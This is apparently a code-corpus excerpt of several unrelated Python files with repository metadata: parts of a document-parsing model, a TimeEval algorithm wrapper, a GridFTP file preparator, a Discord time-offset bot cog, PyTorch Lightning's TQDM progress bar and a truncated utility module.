avg_loss = torch.mean(torch.stack(losses))
ave_losses.append(avg_loss)
(label_units, parses) = rtu.collect_outputs_gt(
self.task, outputs_each_dataloader
)
parsess.append(parses)
data_idss.append(data_ids)
tp_edge, fn_edge, fp_edge = au.cal_tp_fn_fp_of_edges(
label_units, pr_label_units
)
p_edge, r_edge, f1_edge = au.cal_p_r_f1(tp_edge, fn_edge, fp_edge)
else:
# ocr-dev, ocr-test
# ocr-dev, ocr-test do not include ground-truth.
# Thus, ground-truth from dev, test are used for the calculation.
data_ids = [
int(x) for x in data_ids
] # ocr-dev, -test data use string data_id.
avg_loss = ave_losses[i % 2]
parses_unsorted = deepcopy(parsess[i % 2])
data_ids_oracle = deepcopy(data_idss[i % 2])
# sort parses
_ii = [data_ids_oracle.index(id) for id in data_ids]
parses = [parses_unsorted[i] for i in _ii]
# Cannot calculate dependency parsing scores in ocr-dev, ocr-test
p_edge, r_edge, f1_edge = [-1], [-1], [-1]
# 2. Calculate scores
f1, parse_stat, card_stat, corrects_parse = rtu.cal_f1_scores(
self.task,
"test",
parses,
pr_parses,
self.parse_refine_options,
)
test_score_dict = rtu.generate_score_dict(
test_type, avg_loss, p_edge, r_edge, f1_edge, f1, is_tensor=False
)
# 3. Save analysis results
path_analysis_dir = Path(self.hparam.path_analysis_dir)
rtu.save_analysis_results(
path_analysis_dir,
test_type,
test_score_dict,
parse_stat,
card_stat,
corrects_parse,
parses,
pr_parses,
)
def gen_encoder_layer(hparam, path_data_folder):
# 1. Load pretrained transformer
if hparam.encoder_backbone_is_pretrained:
(
pretrained_transformer,
pretrained_transformer_cfg,
) = mu.get_pretrained_transformer(
path_data_folder,
hparam.encoder_backbone_name,
hparam.encoder_backbone_tweak_tag,
)
# 2. Load model
if hparam.encoder_type_name == "spade":
# 2.1 Load encoder
spatial_text_encoder = SpadeEncoder(hparam, path_data_folder)
# 2.2 Initialize the subset of weights from the pretraiend transformer.
if hparam.encoder_backbone_is_pretrained:
print(f"pretrained {hparam.encoder_backbone_name} is used")
mu.check_consistency_between_backbone_and_encoder(
pretrained_transformer_cfg, spatial_text_encoder.transformer_cfg
)
pretrained_transformer_state_dict = pretrained_transformer.state_dict()
spatial_text_encoder = gu.update_part_of_model(
parent_model_state_dict=pretrained_transformer_state_dict,
child_model=spatial_text_encoder,
rank=gu.get_local_rank(),
)
else:
raise NotImplementedError
return spatial_text_encoder
def gen_decoder_layer(hparam, encoder_transformer_cfg):
input_size = encoder_transformer_cfg.hidden_size * len(
hparam.encoder_layer_ids_used_in_decoder
)
# 1. Load decoder
if hparam.decoder_type == "spade":
decoder_layer = SpadeDecoder(
input_size,
hparam.decoder_hidden_size,
hparam.n_relation_type,
hparam.fields,
hparam.token_lv_boxing,
hparam.include_second_order_relations,
hparam.vi_params,
)
else:
raise NotImplementedError
return decoder_layer
| 33.830402 | 102 | 0.559397 |
414df8272aa0e971411fcd39d6d671ed37a1c249 | 1,081 | py | Python | timeeval_experiments/algorithms/copod.py | HPI-Information-Systems/TimeEval | 9b2717b89decd57dd09e04ad94c120f13132d7b8 | [
"MIT"
] | 2 | 2022-01-29T03:46:31.000Z | 2022-02-14T14:06:35.000Z | timeeval_experiments/algorithms/copod.py | HPI-Information-Systems/TimeEval | 9b2717b89decd57dd09e04ad94c120f13132d7b8 | [
"MIT"
] | null | null | null | timeeval_experiments/algorithms/copod.py | HPI-Information-Systems/TimeEval | 9b2717b89decd57dd09e04ad94c120f13132d7b8 | [
"MIT"
] | null | null | null | from durations import Duration
from typing import Any, Dict, Optional
from timeeval import Algorithm, TrainingType, InputDimensionality
from timeeval.adapters import DockerAdapter
from timeeval.params import ParameterConfig
_copod_parameters: Dict[str, Dict[str, Any]] = {
"random_state": {
"defaultValue": 42,
"description": "Seed for random number generation.",
"name": "random_state",
"type": "int"
}
}
def copod(params: ParameterConfig = None, skip_pull: bool = False, timeout: Optional[Duration] = None) -> Algorithm:
return Algorithm(
name="COPOD",
main=DockerAdapter(
image_name="registry.gitlab.hpi.de/akita/i/copod",
skip_pull=skip_pull,
timeout=timeout,
group_privileges="akita",
),
preprocess=None,
postprocess=None,
param_schema=_copod_parameters,
param_config=params or ParameterConfig.defaults(),
data_as_file=True,
training_type=TrainingType.UNSUPERVISED,
input_dimensionality=InputDimensionality("multivariate")
)
| 30.027778 | 116 | 0.687327 |
95342621a4967fee382fc6b28b1f42371faebe5a | 71 | py | Python | 0-buggy.py | kmirik999/Kryvoruchko-Myroslav | 9f4a7fbe333e1ca3750e89e1f206aa9d9ca12145 | [
"MIT"
] | null | null | null | 0-buggy.py | kmirik999/Kryvoruchko-Myroslav | 9f4a7fbe333e1ca3750e89e1f206aa9d9ca12145 | [
"MIT"
] | null | null | null | 0-buggy.py | kmirik999/Kryvoruchko-Myroslav | 9f4a7fbe333e1ca3750e89e1f206aa9d9ca12145 | [
"MIT"
] | null | null | null | first_num = 2
second_num = 3
sum = first_num + second_num
print(sum)
| 10.142857 | 28 | 0.71831 |
7a722b4aa70feab0406b8983660da8c287d0a869 | 87 | py | Python | plugins/rapid7_insightvm/komand_rapid7_insightvm/actions/asset_vulnerability_solution/__init__.py | lukaszlaszuk/insightconnect-plugins | 8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892 | [
"MIT"
] | 46 | 2019-06-05T20:47:58.000Z | 2022-03-29T10:18:01.000Z | plugins/rapid7_insightvm/komand_rapid7_insightvm/actions/asset_vulnerability_solution/__init__.py | lukaszlaszuk/insightconnect-plugins | 8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892 | [
"MIT"
] | 386 | 2019-06-07T20:20:39.000Z | 2022-03-30T17:35:01.000Z | plugins/rapid7_insightvm/komand_rapid7_insightvm/actions/asset_vulnerability_solution/__init__.py | lukaszlaszuk/insightconnect-plugins | 8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892 | [
"MIT"
] | 43 | 2019-07-09T14:13:58.000Z | 2022-03-28T12:04:46.000Z | # GENERATED BY KOMAND SDK - DO NOT EDIT
from .action import AssetVulnerabilitySolution
| 29 | 46 | 0.816092 |
08d7eaa378008e9dd07269e8c249116bcf4b20dc | 5,961 | py | Python | pandaharvester/harvesterpreparator/gridftp_preparator.py | tsulaiav/harvester | ca3f78348019dd616738f2da7d50e81700a8e6b9 | [
"Apache-2.0"
] | 7 | 2019-08-30T07:35:48.000Z | 2022-02-13T14:46:53.000Z | pandaharvester/harvesterpreparator/gridftp_preparator.py | tsulaiav/harvester | ca3f78348019dd616738f2da7d50e81700a8e6b9 | [
"Apache-2.0"
] | 29 | 2019-09-20T14:04:37.000Z | 2021-09-13T12:53:05.000Z | pandaharvester/harvesterpreparator/gridftp_preparator.py | tsulaiav/harvester | ca3f78348019dd616738f2da7d50e81700a8e6b9 | [
"Apache-2.0"
] | 15 | 2019-07-30T11:48:29.000Z | 2022-03-29T21:49:05.000Z | import os
import tempfile
try:
import subprocess32 as subprocess
except Exception:
import subprocess
from pandaharvester.harvestercore.plugin_base import PluginBase
from pandaharvester.harvestercore import core_utils
from pandaharvester.harvestermover import mover_utils
# logger
baseLogger = core_utils.setup_logger('gridftp_preparator')
# preparator plugin with GridFTP
"""
-- Example of plugin config
"preparator": {
"name": "GridFtpPreparator",
"module": "pandaharvester.harvesterpreparator.gridftp_preparator",
# base path for source GridFTP server
"srcBasePath": "gsiftp://dcdum02.aglt2.org/pnfs/aglt2.org/atlasdatadisk/rucio/",
# base path for destination GridFTP server
"dstBasePath": "gsiftp://dcgftp.usatlas.bnl.gov:2811/pnfs/usatlas.bnl.gov/atlasscratchdisk/rucio/",
# base path for local access to the copied files
"localBasePath": "/data/rucio",
# max number of attempts
"maxAttempts": 3,
# check paths under localBasePath. Choose false if destination on remote node
"checkLocalPath": true,
# options for globus-url-copy
"gulOpts": "-cred /tmp/x509_u1234 -sync -sync-level 3 -verify-checksum -v"
}
"""
class GridFtpPreparator(PluginBase):
# constructor
def __init__(self, **kwarg):
self.gulOpts = None
self.maxAttempts = 3
self.timeout = None
self.checkLocalPath = True
PluginBase.__init__(self, **kwarg)
# trigger preparation
def trigger_preparation(self, jobspec):
# make logger
tmpLog = self.make_logger(baseLogger, 'PandaID={0}'.format(jobspec.PandaID),
method_name='trigger_preparation')
tmpLog.debug('start')
# loop over all inputs
inFileInfo = jobspec.get_input_file_attributes()
gucInput = None
for tmpFileSpec in jobspec.inFiles:
# construct source and destination paths
srcPath = mover_utils.construct_file_path(self.srcBasePath, inFileInfo[tmpFileSpec.lfn]['scope'],
tmpFileSpec.lfn)
dstPath = mover_utils.construct_file_path(self.dstBasePath, inFileInfo[tmpFileSpec.lfn]['scope'],
tmpFileSpec.lfn)
# local access path
accPath = mover_utils.construct_file_path(self.localBasePath, inFileInfo[tmpFileSpec.lfn]['scope'],
tmpFileSpec.lfn)
if self.checkLocalPath:
# check if already exits
if os.path.exists(accPath):
# calculate checksum
checksum = core_utils.calc_adler32(accPath)
checksum = 'ad:{0}'.format(checksum)
if checksum == inFileInfo[tmpFileSpec.lfn]['checksum']:
continue
# make directories if needed
if not os.path.isdir(os.path.dirname(accPath)):
os.makedirs(os.path.dirname(accPath))
# make input for globus-url-copy
if gucInput is None:
gucInput = tempfile.NamedTemporaryFile(mode='w', delete=False, suffix='_guc_in.tmp')
gucInput.write("{0} {1}\n".format(srcPath, dstPath))
tmpFileSpec.attemptNr += 1
# nothing to transfer
if gucInput is None:
tmpLog.debug('done with no transfers')
return True, ''
# transfer
tmpLog.debug('execute globus-url-copy')
gucInput.close()
args = ['globus-url-copy', '-f', gucInput.name, '-cd']
if self.gulOpts is not None:
args += self.gulOpts.split()
try:
tmpLog.debug('execute: ' + ' '.join(args))
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
stdout, stderr = p.communicate(timeout=self.timeout)
except subprocess.TimeoutExpired:
p.kill()
stdout, stderr = p.communicate()
tmpLog.warning('command timeout')
return_code = p.returncode
if stdout is not None:
if not isinstance(stdout, str):
stdout = stdout.decode()
stdout = stdout.replace('\n', ' ')
if stderr is not None:
if not isinstance(stderr, str):
stderr = stderr.decode()
stderr = stderr.replace('\n', ' ')
tmpLog.debug("stdout: %s" % stdout)
tmpLog.debug("stderr: %s" % stderr)
except Exception:
core_utils.dump_error_message(tmpLog)
return_code = 1
os.remove(gucInput.name)
if return_code == 0:
tmpLog.debug('succeeded')
return True, ''
else:
errMsg = 'failed with {0}'.format(return_code)
tmpLog.error(errMsg)
# check attemptNr
for tmpFileSpec in jobspec.inFiles:
if tmpFileSpec.attemptNr >= self.maxAttempts:
errMsg = 'gave up due to max attempts'
tmpLog.error(errMsg)
return (False, errMsg)
return None, errMsg
# check status
def check_stage_in_status(self, jobspec):
return True, ''
# resolve input file paths
def resolve_input_paths(self, jobspec):
# input files
inFileInfo = jobspec.get_input_file_attributes()
pathInfo = dict()
for tmpFileSpec in jobspec.inFiles:
accPath = mover_utils.construct_file_path(self.localBasePath, inFileInfo[tmpFileSpec.lfn]['scope'],
tmpFileSpec.lfn)
pathInfo[tmpFileSpec.lfn] = {'path': accPath}
jobspec.set_input_file_paths(pathInfo)
return True, ''
| 41.978873 | 111 | 0.579433 |
137812f465aa6e828ae8094a850f4128269a000c | 2,595 | py | Python | Scripts/Cogs/time_commands.py | Mahas1/BotMan.py-rewritten | 77583eba29e3144798f98886b7fd3f1ad30b27c1 | [
"MIT"
] | null | null | null | Scripts/Cogs/time_commands.py | Mahas1/BotMan.py-rewritten | 77583eba29e3144798f98886b7fd3f1ad30b27c1 | [
"MIT"
] | null | null | null | Scripts/Cogs/time_commands.py | Mahas1/BotMan.py-rewritten | 77583eba29e3144798f98886b7fd3f1ad30b27c1 | [
"MIT"
] | null | null | null | import re
import discord
from discord.ext import commands
import os
import json
from assets import time_custom
class Time(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(name='time',
description='Gets the time of the user. if user does not have a timezone set, '
'they can use an offset like "+2:30"')
async def get_time(self, ctx, user: discord.Member = None):
if user is None:
user = ctx.author
user_id = str(user.id)
if not os.path.exists('./storage/time.json'): # create file if not exists
with open('./storage/time.json', 'w') as jsonFile:
print('./storage/time.json has been created')
json.dump({}, jsonFile)
with open('./storage/time.json', 'r') as timeFile:
time_data = json.load(timeFile)
user_offset = time_data.get(user_id)
if user_offset is None:
return await ctx.send(
f'_{user.display_name}_ has not set their offset. They can do so using the `setoffset` command.')
"""None of the following code is executed if user_offset is None"""
final_time_string = time_custom.time_bm(user_offset)
await ctx.send(final_time_string)
@commands.command(name='setoffset', description='Sets the user\'s time offset.\n'
'Format for offset: `-2:30`, `+2:30`, or just `2:30`\n'
'**Nerd note**: the regex for the offset is '
r'`^[+\-]?\d+:\d+$`')
async def set_offset(self, ctx, offset):
pattern = r'^[+\-]?\d+:\d+$'
if not re.match(pattern, offset): # matches the pattern, and if it fails, returns an error message
return await ctx.send('Improper offset format. Please read the help command for more info.')
if not os.path.exists('./storage/time.json'): # create file if not exists
with open('./storage/time.json', 'w') as jsonFile:
print('./storage/time.json has been created')
json.dump({}, jsonFile)
with open('./storage/time.json', 'r') as timeFile:
time_data = json.load(timeFile)
time_data[ctx.author.id] = offset
with open('./storage/time.json', 'w') as timeFile:
json.dump(time_data, timeFile)
await ctx.send(f'Time offset set as {offset} successfully.')
def setup(bot):
bot.add_cog(Time(bot))
| 36.041667 | 113 | 0.565703 |
813cecd92cd7f6b512d5791f5423a5829db2b697 | 15,296 | py | Python | pytorch_lightning/callbacks/progress/tqdm_progress.py | FeryET/pytorch-lightning | b1f8b111b5085373599758a4e155a482259cdbf0 | [
"Apache-2.0"
] | null | null | null | pytorch_lightning/callbacks/progress/tqdm_progress.py | FeryET/pytorch-lightning | b1f8b111b5085373599758a4e155a482259cdbf0 | [
"Apache-2.0"
] | 1 | 2022-03-18T21:56:53.000Z | 2022-03-18T21:56:53.000Z | pytorch_lightning/callbacks/progress/tqdm_progress.py | FeryET/pytorch-lightning | b1f8b111b5085373599758a4e155a482259cdbf0 | [
"Apache-2.0"
] | null | null | null | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import importlib
import math
import os
import sys
from typing import Any, Dict, Optional, Union
# check if ipywidgets is installed before importing tqdm.auto
# to ensure it won't fail and a progress bar is displayed
if importlib.util.find_spec("ipywidgets") is not None:
from tqdm.auto import tqdm as _tqdm
else:
from tqdm import tqdm as _tqdm
import pytorch_lightning as pl
from pytorch_lightning.callbacks.progress.base import ProgressBarBase
from pytorch_lightning.utilities.rank_zero import rank_zero_debug
_PAD_SIZE = 5
class Tqdm(_tqdm):
def __init__(self, *args: Any, **kwargs: Any) -> None:
"""Custom tqdm progressbar where we append 0 to floating points/strings to prevent the progress bar from
flickering."""
# this just to make the make docs happy, otherwise it pulls docs which has some issues...
super().__init__(*args, **kwargs)
@staticmethod
def format_num(n: Union[int, float, str]) -> str:
"""Add additional padding to the formatted numbers."""
should_be_padded = isinstance(n, (float, str))
if not isinstance(n, str):
n = _tqdm.format_num(n)
assert isinstance(n, str)
if should_be_padded and "e" not in n:
if "." not in n and len(n) < _PAD_SIZE:
try:
_ = float(n)
except ValueError:
return n
n += "."
n += "0" * (_PAD_SIZE - len(n))
return n
class TQDMProgressBar(ProgressBarBase):
r"""
This is the default progress bar used by Lightning. It prints to ``stdout`` using the
:mod:`tqdm` package and shows up to four different bars:
- **sanity check progress:** the progress during the sanity check run
- **main progress:** shows training + validation progress combined. It also accounts for
multiple validation runs during training when
:paramref:`~pytorch_lightning.trainer.trainer.Trainer.val_check_interval` is used.
- **validation progress:** only visible during validation;
shows total progress over all validation datasets.
- **test progress:** only active when testing; shows total progress over all test datasets.
For infinite datasets, the progress bar never ends.
If you want to customize the default ``tqdm`` progress bars used by Lightning, you can override
specific methods of the callback class and pass your custom implementation to the
:class:`~pytorch_lightning.trainer.trainer.Trainer`.
Example:
>>> class LitProgressBar(TQDMProgressBar):
... def init_validation_tqdm(self):
... bar = super().init_validation_tqdm()
... bar.set_description('running validation ...')
... return bar
...
>>> bar = LitProgressBar()
>>> from pytorch_lightning import Trainer
>>> trainer = Trainer(callbacks=[bar])
Args:
refresh_rate: Determines at which rate (in number of batches) the progress bars get updated.
Set it to ``0`` to disable the display. By default, the :class:`~pytorch_lightning.trainer.trainer.Trainer`
uses this implementation of the progress bar and sets the refresh rate to the value provided to the
:paramref:`~pytorch_lightning.trainer.trainer.Trainer.progress_bar_refresh_rate` argument in the
:class:`~pytorch_lightning.trainer.trainer.Trainer`.
process_position: Set this to a value greater than ``0`` to offset the progress bars by this many lines.
This is useful when you have progress bars defined elsewhere and want to show all of them
together. This corresponds to
:paramref:`~pytorch_lightning.trainer.trainer.Trainer.process_position` in the
:class:`~pytorch_lightning.trainer.trainer.Trainer`.
"""
def __init__(self, refresh_rate: int = 1, process_position: int = 0):
super().__init__()
self._refresh_rate = self._resolve_refresh_rate(refresh_rate)
self._process_position = process_position
self._enabled = True
self._main_progress_bar: Optional[_tqdm] = None
self._val_progress_bar: Optional[_tqdm] = None
self._test_progress_bar: Optional[_tqdm] = None
self._predict_progress_bar: Optional[_tqdm] = None
def __getstate__(self) -> Dict:
# can't pickle the tqdm objects
return {k: v if not isinstance(v, _tqdm) else None for k, v in vars(self).items()}
@property
def main_progress_bar(self) -> _tqdm:
if self._main_progress_bar is None:
raise TypeError(f"The `{self.__class__.__name__}._main_progress_bar` reference has not been set yet.")
return self._main_progress_bar
@main_progress_bar.setter
def main_progress_bar(self, bar: _tqdm) -> None:
self._main_progress_bar = bar
@property
def val_progress_bar(self) -> _tqdm:
if self._val_progress_bar is None:
raise TypeError(f"The `{self.__class__.__name__}._val_progress_bar` reference has not been set yet.")
return self._val_progress_bar
@val_progress_bar.setter
def val_progress_bar(self, bar: _tqdm) -> None:
self._val_progress_bar = bar
@property
def test_progress_bar(self) -> _tqdm:
if self._test_progress_bar is None:
raise TypeError(f"The `{self.__class__.__name__}._test_progress_bar` reference has not been set yet.")
return self._test_progress_bar
@test_progress_bar.setter
def test_progress_bar(self, bar: _tqdm) -> None:
self._test_progress_bar = bar
@property
def predict_progress_bar(self) -> _tqdm:
if self._predict_progress_bar is None:
raise TypeError(f"The `{self.__class__.__name__}._predict_progress_bar` reference has not been set yet.")
return self._predict_progress_bar
@predict_progress_bar.setter
def predict_progress_bar(self, bar: _tqdm) -> None:
self._predict_progress_bar = bar
@property
def refresh_rate(self) -> int:
return self._refresh_rate
@property
def process_position(self) -> int:
return self._process_position
@property
def is_enabled(self) -> bool:
return self._enabled and self.refresh_rate > 0
@property
def is_disabled(self) -> bool:
return not self.is_enabled
@property
def _val_processed(self) -> int:
if self.trainer.state.fn == "fit":
# use total in case validation runs more than once per training epoch
return self.trainer.fit_loop.epoch_loop.val_loop.epoch_loop.batch_progress.total.processed
return self.trainer.validate_loop.epoch_loop.batch_progress.current.processed
def disable(self) -> None:
self._enabled = False
def enable(self) -> None:
self._enabled = True
def init_sanity_tqdm(self) -> Tqdm:
"""Override this to customize the tqdm bar for the validation sanity run."""
bar = Tqdm(
desc="Validation sanity check",
position=(2 * self.process_position),
disable=self.is_disabled,
leave=False,
dynamic_ncols=True,
file=sys.stdout,
)
return bar
def init_train_tqdm(self) -> Tqdm:
"""Override this to customize the tqdm bar for training."""
bar = Tqdm(
desc="Training",
initial=self.train_batch_idx,
position=(2 * self.process_position),
disable=self.is_disabled,
leave=True,
dynamic_ncols=True,
file=sys.stdout,
smoothing=0,
)
return bar
def init_predict_tqdm(self) -> Tqdm:
"""Override this to customize the tqdm bar for predicting."""
bar = Tqdm(
desc="Predicting",
initial=self.train_batch_idx,
position=(2 * self.process_position),
disable=self.is_disabled,
leave=True,
dynamic_ncols=True,
file=sys.stdout,
smoothing=0,
)
return bar
def init_validation_tqdm(self) -> Tqdm:
"""Override this to customize the tqdm bar for validation."""
# The main progress bar doesn't exist in `trainer.validate()`
has_main_bar = self.trainer.state.fn != "validate"
bar = Tqdm(
desc="Validating",
position=(2 * self.process_position + has_main_bar),
disable=self.is_disabled,
leave=not has_main_bar,
dynamic_ncols=True,
file=sys.stdout,
)
return bar
def init_test_tqdm(self) -> Tqdm:
"""Override this to customize the tqdm bar for testing."""
bar = Tqdm(
desc="Testing",
position=(2 * self.process_position),
disable=self.is_disabled,
leave=True,
dynamic_ncols=True,
file=sys.stdout,
)
return bar
def on_sanity_check_start(self, *_: Any) -> None:
self.val_progress_bar = self.init_sanity_tqdm()
self.main_progress_bar = Tqdm(disable=True) # dummy progress bar
def on_sanity_check_end(self, *_: Any) -> None:
self.main_progress_bar.close()
self.val_progress_bar.close()
def on_train_start(self, *_: Any) -> None:
self.main_progress_bar = self.init_train_tqdm()
def on_train_epoch_start(self, trainer: "pl.Trainer", *_: Any) -> None:
total_train_batches = self.total_train_batches
total_val_batches = self.total_val_batches
if total_train_batches != float("inf") and total_val_batches != float("inf"):
# val can be checked multiple times per epoch
val_checks_per_epoch = total_train_batches // trainer.val_check_batch
total_val_batches = total_val_batches * val_checks_per_epoch
total_batches = total_train_batches + total_val_batches
self.main_progress_bar.total = convert_inf(total_batches)
self.main_progress_bar.set_description(f"Epoch {trainer.current_epoch}")
def on_train_batch_end(self, trainer: "pl.Trainer", pl_module: "pl.LightningModule", *_: Any) -> None:
if self._should_update(self.train_batch_idx):
_update_n(self.main_progress_bar, self.train_batch_idx + self._val_processed)
self.main_progress_bar.set_postfix(self.get_metrics(trainer, pl_module))
def on_train_epoch_end(self, trainer: "pl.Trainer", pl_module: "pl.LightningModule") -> None:
_update_n(self.main_progress_bar, self.train_batch_idx + self._val_processed)
if not self.main_progress_bar.disable:
self.main_progress_bar.set_postfix(self.get_metrics(trainer, pl_module))
def on_train_end(self, *_: Any) -> None:
self.main_progress_bar.close()
def on_validation_start(self, trainer: "pl.Trainer", *_: Any) -> None:
if trainer.sanity_checking:
self.val_progress_bar.total = sum(trainer.num_sanity_val_batches)
else:
self.val_progress_bar = self.init_validation_tqdm()
self.val_progress_bar.total = convert_inf(self.total_val_batches)
def on_validation_batch_end(self, trainer: "pl.Trainer", *_: Any) -> None:
if self._should_update(self.val_batch_idx):
_update_n(self.val_progress_bar, self.val_batch_idx)
if trainer.state.fn == "fit":
_update_n(self.main_progress_bar, self.train_batch_idx + self._val_processed)
def on_validation_epoch_end(self, *_: Any) -> None:
_update_n(self.val_progress_bar, self._val_processed)
def on_validation_end(self, trainer: "pl.Trainer", pl_module: "pl.LightningModule") -> None:
if self._main_progress_bar is not None and trainer.state.fn == "fit":
self.main_progress_bar.set_postfix(self.get_metrics(trainer, pl_module))
self.val_progress_bar.close()
def on_test_start(self, *_: Any) -> None:
self.test_progress_bar = self.init_test_tqdm()
self.test_progress_bar.total = convert_inf(self.total_test_batches)
def on_test_batch_end(self, *_: Any) -> None:
if self._should_update(self.test_batch_idx):
_update_n(self.test_progress_bar, self.test_batch_idx)
def on_test_epoch_end(self, *_: Any) -> None:
_update_n(self.test_progress_bar, self.test_batch_idx)
def on_test_end(self, *_: Any) -> None:
self.test_progress_bar.close()
def on_predict_epoch_start(self, *_: Any) -> None:
self.predict_progress_bar = self.init_predict_tqdm()
self.predict_progress_bar.total = convert_inf(self.total_predict_batches)
def on_predict_batch_end(self, *_: Any) -> None:
if self._should_update(self.predict_batch_idx):
_update_n(self.predict_progress_bar, self.predict_batch_idx)
def on_predict_end(self, *_: Any) -> None:
self.predict_progress_bar.close()
def print(self, *args: Any, sep: str = " ", **kwargs: Any) -> None:
active_progress_bar = None
if self._main_progress_bar is not None and not self.main_progress_bar.disable:
active_progress_bar = self.main_progress_bar
elif self._val_progress_bar is not None and not self.val_progress_bar.disable:
active_progress_bar = self.val_progress_bar
elif self._test_progress_bar is not None and not self.test_progress_bar.disable:
active_progress_bar = self.test_progress_bar
elif self._predict_progress_bar is not None and not self.predict_progress_bar.disable:
active_progress_bar = self.predict_progress_bar
if active_progress_bar is not None:
s = sep.join(map(str, args))
active_progress_bar.write(s, **kwargs)
def _should_update(self, idx: int) -> bool:
return self.refresh_rate > 0 and idx % self.refresh_rate == 0
@staticmethod
def _resolve_refresh_rate(refresh_rate: int) -> int:
if os.getenv("COLAB_GPU") and refresh_rate == 1:
# smaller refresh rate on colab causes crashes, choose a higher value
rank_zero_debug("Using a higher refresh rate on Colab. Setting it to `20`")
refresh_rate = 20
return refresh_rate
def convert_inf(x: Optional[Union[int, float]]) -> Optional[Union[int, float]]:
"""The tqdm doesn't support inf/nan values.
We have to convert it to None.
"""
if x is None or math.isinf(x) or math.isnan(x):
return None
return x
def _update_n(bar: _tqdm, value: int) -> None:
if not bar.disable:
bar.n = value
bar.refresh()
| 40.680851 | 119 | 0.663899 |
9e9b63d345e85d99d6fdf0d277eed09225a85993 | 28,944 | py | Python | u.py | mit-han-lab/neurips-micronet | a85bd0ed719b5d6f45642d71f5b83a8eed916025 | [
"MIT"
] | 37 | 2019-11-08T02:11:47.000Z | 2022-02-11T00:55:15.000Z | u.py | mit-han-lab/neurips-micronet | a85bd0ed719b5d6f45642d71f5b83a8eed916025 | [
"MIT"
] | 3 | 2020-02-15T10:56:24.000Z | 2021-03-31T03:40:36.000Z | u.py | mit-han-lab/neurips-micronet | a85bd0ed719b5d6f45642d71f5b83a8eed916025 | [
"MIT"
] | 7 | 2020-01-13T06:20:43.000Z | 2022-02-11T00:55:18.000Z | ### Common global imports ###
from __future__ import absolute_import, print_function
import subprocess, sys, os, re, tempfile, zipfile, gzip, io, shutil, string, random, itertools, pickle, json, yaml, gc
from datetime import datetime
from time import time
from fnmatch import fnmatch
from glob import glob
from tqdm import tqdm
from collections import defaultdict, Counter, OrderedDict
import warnings
warnings.filterwarnings('ignore')
from io import StringIO
### Util methods ###
def get_encoder(decoder):
return dict((x, i) for i, x in enumerate(decoder))
def load_json(path):
with open(path, 'r+') as f:
return json.load(f)
def save_json(path, dict_):
with open(path, 'w+') as f:
json.dump(dict_, f, indent=4, sort_keys=True)
def format_json(dict_):
return json.dumps(dict_, indent=4, sort_keys=True)
def format_yaml(dict_):
dict_ = recurse(dict_, lambda x: x._ if type(x) is Path else dict(x) if type(x) is dict else x)
return yaml.dump(dict_)
def load_text(path, encoding='utf-8'):
with open(path, 'r', encoding=encoding) as f:
return f.read()
def save_text(path, string):
with open(path, 'w') as f:
f.write(string)
def load_pickle(path):
with open(path, 'rb') as f:
return pickle.load(f)
def save_pickle(path, obj):
with open(path, 'wb') as f:
pickle.dump(obj, f)
def wget(link, output_dir):
cmd = 'wget %s -P %s' % (path, output_dir)
shell(cmd)
output_path = Path(output_dir) / os.path.basename(link)
if not output_path.exists(): raise RuntimeError('Failed to run %s' % cmd)
return output_path
def extract(input_path, output_path=None):
if input_path[-3:] == '.gz':
if not output_path:
output_path = input_path[:-3]
with gzip.open(input_path, 'rb') as f_in:
with open(output_path, 'wb') as f_out:
f_out.write(f_in.read())
else:
raise RuntimeError('Don\'t know file extension for ' + input_path)
def shell(cmd, wait=True, ignore_error=2):
if type(cmd) != str:
cmd = ' '.join(cmd)
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if not wait:
return process
out, err = process.communicate()
return out.decode(), err.decode() if err else None
def attributes(obj):
import inspect, pprint
pprint.pprint(inspect.getmembers(obj, lambda a: not inspect.isroutine(a)))
def import_module(module_name, module_path):
import imp
module = imp.load_source(module_name, module_path)
return module
_log_path = None
def logger(directory=None):
global _log_path
if directory and not _log_path:
from datetime import datetime
_log_path = Path(directory) / datetime.now().isoformat().replace(':', '_').rsplit('.')[0] + '.log'
return log
def log(text):
print(text)
if _log_path:
with open(_log_path, 'a') as f:
f.write(text)
f.write('\n')
class Path(str):
def __init__(self, path):
pass
def __add__(self, subpath):
return Path(str(self) + str(subpath))
def __truediv__(self, subpath):
return Path(os.path.join(str(self), str(subpath)))
def __floordiv__(self, subpath):
return (self / subpath)._
def ls(self, show_hidden=True, dir_only=False, file_only=False):
subpaths = [Path(self / subpath) for subpath in os.listdir(self) if show_hidden or not subpath.startswith('.')]
isdirs = [os.path.isdir(subpath) for subpath in subpaths]
subdirs = [subpath for subpath, isdir in zip(subpaths, isdirs) if isdir]
files = [subpath for subpath, isdir in zip(subpaths, isdirs) if not isdir]
if dir_only:
return subdirs
if file_only:
return files
return subdirs, files
def recurse(self, dir_fn=None, file_fn=None):
if dir_fn is not None:
dir_fn(self)
dirs, files = self.ls()
if file_fn is not None:
list(map(file_fn, files))
for dir in dirs:
dir.recurse(dir_fn=dir_fn, file_fn=file_fn)
def mk(self):
os.makedirs(self, exist_ok=True)
return self
def rm(self):
if self.isfile() or self.islink():
os.remove(self)
elif self.isdir():
shutil.rmtree(self)
return self
def mv(self, dest):
shutil.move(self, dest)
def mv_from(self, src):
shutil.move(src, self)
def cp(self, dest):
shutil.copy(self, dest)
def cp_from(self, src):
shutil.copy(src, self)
def link(self, target, force=False):
if self.exists():
if not force:
return
else:
self.rm()
os.symlink(target, self)
def exists(self):
return os.path.exists(self)
def isfile(self):
return os.path.isfile(self)
def isdir(self):
return os.path.isdir(self)
def islink(self):
return os.path.islink(self)
def rel(self, start=None):
return Path(os.path.relpath(self, start=start))
def clone(self):
name = self._name
match = re.search('__([0-9]+)$', name)
if match is None:
base = self + '__'
i = 1
else:
initial = match.group(1)
base = self[:-len(initial)]
i = int(initial) + 1
while True:
path = Path(base + str(i))
if not path.exists():
return path
i += 1
@property
def _(self):
